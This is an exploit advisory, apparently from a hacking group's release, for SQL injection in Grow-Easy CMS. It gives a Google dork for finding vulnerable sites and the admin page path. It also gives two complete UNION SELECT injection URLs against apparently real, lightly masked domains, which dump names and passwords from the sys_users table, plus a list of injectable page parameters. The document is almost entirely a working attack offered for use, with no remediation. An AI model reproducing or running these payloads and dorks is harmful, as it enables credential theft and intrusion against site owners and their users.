[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : Grow-Easy CMS SQL Injection Vulnerability
[+]
[+] Exploit Author : Ashiyane Digital Security Team
[+]
[+] Google Dork : inurl:"newsList.php?catalog="
[+]
[+] Admin Page: Site.com/cms
[+]
[+] Date: 2015 August 10
[+]
[+] Tested On : Kali Linux , BackTrack
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Examples and Explanations : Vulnerabilities Are On The Pages Wich Get The id Of Query From GET Method(URL).And Can Get The Login Info From The Same Method group_concat(name,0x3a,password) from sys_users.
[+]
[+]www.marscctXv.net/newsDetail.php?id=4 AND 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,group_concat(name,0x3a,password) from sys_users --+
[+]
[+]https://esatXcom.com/newsList.php?catalog=146 AND 0 UNION SELECT 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from sys_users --+
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Pages :
[+]
[+] productList.php?catalog=177'
[+]
[+] newsDetail.php?id=1501'
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by : The Nonexistent
[+] Special Thanks : All Ashiyane Members And Exploiting Team.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]